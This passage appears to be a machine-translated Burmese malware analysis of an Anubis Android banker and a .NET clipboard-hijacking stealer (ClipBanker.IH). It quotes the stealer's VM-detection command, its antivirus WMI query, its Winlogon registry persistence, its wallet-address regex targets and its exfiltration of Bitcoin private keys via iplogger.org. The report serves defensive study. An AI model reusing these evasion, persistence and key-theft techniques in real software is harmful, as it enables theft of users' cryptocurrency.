တူညီသောသော့နှင့် အယ်လဂိုရီသမ်ကို စာကြောင်းများကို စာဝှက်ရန် အသုံးပြုသည်။ JAR တွင်တည်ရှိသည်။ APK_ROOT + image/files. ဖိုင်၏ပထမ 4 bytes တွင် အရှည်အကွက်ပြီးနောက် ချက်ချင်းစတင်သည့် ကုဒ်ဝှက်ထားသော JAR ၏အရှည်ပါရှိသည်။

ဖိုင်ကို ကုဒ်ဝှက်ထားခြင်းဖြင့် ၎င်းသည် Anubis ဖြစ်သည် - ယခင်က တွေ့ရှိခဲ့သည်။ မှတ်တမ်းတင်ထားသည်။ Android အတွက် ဘဏ်လုပ်ငန်းရှင်။ Malware တွင် အောက်ပါအင်္ဂါရပ်များ ရှိသည်။

• မိုက်ခရိုဖုန်း မှတ်တမ်းတင်ခြင်း။
• ဖန်သားပြင်ဓာတ်ပုံများရိုက်ခြင်း။
• GPS သြဒိနိတ်များကို ရယူခြင်း။
• ကီးလော့ဂ်ဂါ
• စက်ပစ္စည်းဒေတာ ကုဒ်ဝှက်ခြင်းနှင့် ရွေးနုတ်ဖိုး တောင်းဆိုမှု
• spam ပေးပို့ခြင်း။

စိတ်ဝင်စားစရာမှာ ဘဏ်လုပ်ငန်းရှင်သည် အခြားသော C&C ဆာဗာကို ရယူရန် အရန်ဆက်သွယ်ရေးလမ်းကြောင်းအဖြစ် Twitter ကို အသုံးပြုခဲ့သည်။ ကျွန်ုပ်တို့ ခွဲခြမ်းစိတ်ဖြာသည့်နမူနာသည် @JonesTrader အကောင့်ကို အသုံးပြုထားသော်လည်း ခွဲခြမ်းစိတ်ဖြာသည့်အချိန်တွင် ၎င်းကို ပိတ်ဆို့ထားပြီးဖြစ်သည်။

ဘဏ်လုပ်ငန်းရှင်သည် Android စက်ပစ္စည်းပေါ်ရှိ ပစ်မှတ်အပလီကေးရှင်းများစာရင်းပါရှိသည်။ ၎င်းသည် Sophos လေ့လာမှုတွင်ရရှိသောစာရင်းထက် ပိုရှည်သည်။ စာရင်းတွင် ဘဏ်လုပ်ငန်းဆိုင်ရာ အက်ပ်လီကေးရှင်းများစွာ၊ Amazon နှင့် eBay ကဲ့သို့သော အွန်လိုင်းစျေးဝယ်ပရိုဂရမ်များနှင့် cryptocurrency ဝန်ဆောင်မှုများ ပါဝင်သည်။

MSIL/ClipBanker.IH

ဤကမ်ပိန်း၏တစ်စိတ်တစ်ပိုင်းအဖြစ် ဖြန့်ဝေထားသော နောက်ဆုံးအစိတ်အပိုင်းမှာ .NET Windows executable ဖြစ်ပြီး၊ မတ်လ 2019 တွင်ပေါ်လာသည်။ လေ့လာထားသောဗားရှင်းအများစုကို ConfuserEx v1.0.0 ဖြင့်ထုပ်ပိုးထားသည်။ ClipBanker ကဲ့သို့ပင်၊ ဤအစိတ်အပိုင်းသည် ကလစ်ဘုတ်ကို အသုံးပြုသည်။ သူ၏ပန်းတိုင်သည် ကျယ်ပြန့်သော cryptocurrencies များအပြင် Steam တွင် ကမ်းလှမ်းချက်များဖြစ်သည်။ ထို့အပြင်၊ သူသည် Bitcoin သီးသန့် WIF သော့ကိုခိုးယူရန် IP Logger ဝန်ဆောင်မှုကိုအသုံးပြုသည်။

ကာကွယ်မှု ယန္တရားများ
ConfuserEx သည် အမှားရှာပြင်ခြင်း၊ မြှပ်နှံခြင်းနှင့် လက်ဆော့ခြင်းတို့ကို တားဆီးရာတွင် ပံ့ပိုးပေးသည့် အကျိုးကျေးဇူးများအပြင်၊ အစိတ်အပိုင်းတွင် ဗိုင်းရပ်စ်နှိမ်နင်းရေး ထုတ်ကုန်များနှင့် အတုအယောင် စက်များကို ရှာဖွေနိုင်မှု ပါဝင်သည်။

၎င်းသည် virtual machine တစ်ခုတွင်အလုပ်လုပ်ကြောင်းအတည်ပြုရန်၊ malware သည် BIOS အချက်အလက်ကိုတောင်းဆိုရန် built-in Windows WMI command line (WMIC) ကိုအသုံးပြုသည် -

wmic bios

ထို့နောက် ပရိုဂရမ်သည် အမိန့်ပေးသည့်အထွက်ကို ခွဲခြမ်းစိပ်ဖြာပြီး VBOX၊ VirtualBox၊ XEN၊ qemu၊ bochs၊ VM သော့ချက်စာလုံးများကို ရှာဖွေသည်။

ဗိုင်းရပ်စ်နှိမ်နင်းရေး ထုတ်ကုန်များကို ထောက်လှမ်းရန်၊ Malware သည် Windows Management Instrumentation (WMI) တောင်းဆိုချက်ကို အသုံးပြု၍ Windows Security Center သို့ ပေးပို့သည်။ ManagementObjectSearcher API ကို အောက်မှာ ပြထားသလိုပါပဲ။ base64 မှ ကုဒ်ပြောင်းပြီးနောက် ခေါ်ဆိုမှုသည် ဤကဲ့သို့ ဖြစ်ပုံရသည်။

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

ပုံ 3။ ဗိုင်းရပ်စ် တိုက်ဖျက်ရေး ထုတ်ကုန်များကို ခွဲခြားသတ်မှတ်ခြင်း လုပ်ငန်းစဉ်။

ထို့အပြင် malware ရှိမရှိကိုလည်းစစ်ဆေးသည်။ CryptoClipWatcherကလစ်ဘုတ်တိုက်ခိုက်မှုများကို ကာကွယ်ရန် ကိရိယာတစ်ခုဖြစ်ပြီး၊ အလုပ်လုပ်နေပါက၊ ထိုလုပ်ငန်းစဉ်ရှိ thread အားလုံးကို ဆိုင်းငံ့ထားခြင်းဖြင့် အကာအကွယ်ကို ပိတ်လိုက်ပါ။

စွဲမြဲစွာ

ကျွန်ုပ်တို့လေ့လာခဲ့သော malware ဗားရှင်းကို သူကိုယ်တိုင် ကူးယူထားပါသည်။ %APPDATA%googleupdater.exe နှင့် google directory အတွက် "hidden" attribute ကို သတ်မှတ်သည်။ ထို့နောက် တန်ဖိုးကို ပြောင်းလဲလိုက်သည်။ SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows registry တွင် လမ်းကြောင်းကို ပေါင်းထည့်သည်။ updater.exe. ဤနည်းအားဖြင့်၊ အသုံးပြုသူသည် ဝင်ရောက်သည့်အခါတိုင်း Malware များကို လုပ်ဆောင်မည်ဖြစ်သည်။

အကြံအဖန်ပြုမှု

ClipBanker ကဲ့သို့ပင်၊ malware သည် ကလစ်ဘုတ်၏ အကြောင်းအရာများကို စောင့်ကြည့်ပြီး cryptocurrency ပိုက်ဆံအိတ်လိပ်စာများကို ရှာဖွေပြီး တွေ့ရှိပါက ၎င်းကို အော်ပရေတာ၏လိပ်စာတစ်ခုဖြင့် အစားထိုးသည်။ အောက်တွင်ဖော်ပြထားသည်မှာ ကုဒ်တွင်တွေ့ရှိရသောအရာအပေါ်အခြေခံ၍ ပစ်မှတ်လိပ်စာများစာရင်းဖြစ်သည်။

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

လိပ်စာအမျိုးအစားတစ်ခုစီအတွက် သက်ဆိုင်ရာပုံမှန်အသုံးအနှုန်းတစ်ခုရှိသည်။ STEAM_URL တန်ဖိုးကို Steam စနစ်အား တိုက်ခိုက်ရန်အတွက် အသုံးပြုထားသည်၊ ကြားခံတွင် သတ်မှတ်ရန် အသုံးပြုသည့် ပုံမှန်အသုံးအနှုန်းမှ တွေ့မြင်နိုင်သည်-

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

Exfiltration ချန်နယ်

ကြားခံရှိလိပ်စာများကို အစားထိုးခြင်းအပြင်၊ malware သည် Bitcoin၊ Bitcoin Core နှင့် Electrum Bitcoin ပိုက်ဆံအိတ်များ၏ သီးသန့် WIF သော့များကို ပစ်မှတ်ထားသည်။ ပရိုဂရမ်သည် WIF သီးသန့်သော့ကို ရယူရန် ဖယ်ရှားရေးချန်နယ်တစ်ခုအဖြစ် plogger.org ကို အသုံးပြုသည်။ ထိုသို့လုပ်ဆောင်ရန်၊ အော်ပရေတာများသည် အောက်တွင်ပြထားသည့်အတိုင်း User-Agent HTTP ခေါင်းစီးသို့ လျှို့ဝှက်သော့ဒေတာကို ပေါင်းထည့်သည်။

ပုံ 4. အထွက်ဒေတာပါရှိသော IP Logger ကွန်ဆိုးလ်။

အော်ပရေတာများသည် iplogger.org ကိုအသုံးမပြုဘဲ ပိုက်ဆံအိတ်များကို ဖယ်ထုတ်သည်။ အကွက်ထဲတွင် စာလုံး 255 လုံး ကန့်သတ်ချက်ကြောင့် ၎င်းတို့သည် မတူညီသောနည်းလမ်းကို အသုံးပြုခဲ့ခြင်း ဖြစ်နိုင်သည်။ User-AgentIP Logger ဝဘ်အင်တာဖေ့စ်တွင်ပြသထားသည်။ ကျွန်ုပ်တို့လေ့လာခဲ့သည့်နမူနာများတွင် အခြားအထွက်ဆာဗာကို ပတ်၀န်းကျင်ပြောင်းလဲနိုင်သောပုံစံတွင် သိမ်းဆည်းထားသည်။ DiscordWebHook. အံ့သြစရာကောင်းတာက၊ ဒီပတ်ဝန်းကျင် ကိန်းရှင်ကို ကုဒ်ရဲ့ ဘယ်နေရာမှာမှ တာဝန်မပေးပါဘူး။ ၎င်းသည် malware သည် ဖွံ့ဖြိုးတိုးတက်ဆဲဖြစ်ပြီး ကိန်းရှင်အား အော်ပရေတာ၏ စမ်းသပ်စက်တွင် တာဝန်ပေးအပ်ထားကြောင်း ညွှန်ပြသည်။

ပရိုဂရမ်သည် ဖွံ့ဖြိုးဆဲဖြစ်ကြောင်း အခြားလက္ခဏာတစ်ရပ်ရှိသေးသည်။ ဒွိဖိုင်တွင် iplogger.org URL နှစ်ခုပါဝင်ပြီး ဒေတာများကို ဖယ်ရှားလိုက်သောအခါ နှစ်ခုလုံးကို မေးမြန်းမည်ဖြစ်သည်။ ဤ URL များထဲမှ တစ်ခုသို့ တောင်းဆိုမှုတစ်ခုတွင်၊ ကိုးကားသူအကွက်ရှိ တန်ဖိုးသည် “DEV /” ၏ ရှေ့တွင် ရှိနေသည်။ ConfuserEx ကို အသုံးပြု၍ မထုပ်ပိုးထားသော ဗားရှင်းကိုလည်း တွေ့ရှိခဲ့ပြီး၊ ဤ URL အတွက် လက်ခံသူကို DevFeedbackUrl ဟုခေါ်သည်။ ပတ်ဝန်းကျင်ပြောင်းလဲနိုင်သောအမည်ကိုအခြေခံ၍ အော်ပရေတာများသည် cryptocurrency ပိုက်ဆံအိတ်များကိုခိုးယူရန်အတွက်တရားဝင်ဝန်ဆောင်မှု Discord နှင့် ၎င်း၏ဝဘ်ကြားဖြတ်စနစ်တို့ကိုအသုံးပြုရန်စီစဉ်ထားကြောင်းကျွန်ုပ်တို့ယုံကြည်ပါသည်။

ကောက်ချက်

ဤကမ်ပိန်းသည် ဆိုက်ဘာတိုက်ခိုက်မှုများတွင် တရားဝင်ကြော်ငြာဝန်ဆောင်မှုများကို အသုံးပြုခြင်း၏ ဥပမာတစ်ခုဖြစ်သည်။ အဆိုပါ အစီအစဉ်သည် ရုရှားအဖွဲ့အစည်းများကို ပစ်မှတ်ထားသော်လည်း ရုရှားမဟုတ်သော ဝန်ဆောင်မှုများကို အသုံးပြုကာ ယခုကဲ့သို့ တိုက်ခိုက်မှုကို မြင်တွေ့ရခြင်းမှာ ကျွန်ုပ်တို့ အံ့သြမည်မဟုတ်ပါ။ အပေးအယူကို ရှောင်ရှားရန်၊ အသုံးပြုသူများသည် ၎င်းတို့ဒေါင်းလုဒ်လုပ်ထားသော ဆော့ဖ်ဝဲလ်၏ အရင်းအမြစ်၏ ဂုဏ်သတင်းကို ယုံကြည်မှုရှိရပါမည်။

အပေးအယူ အညွှန်းကိန်းများနှင့် MITER ATT&CK ရည်ညွှန်းချက်များ အပြည့်အစုံစာရင်းကို တွင် ရနိုင်ပါသည်။ link ကို.

source: www.habr.com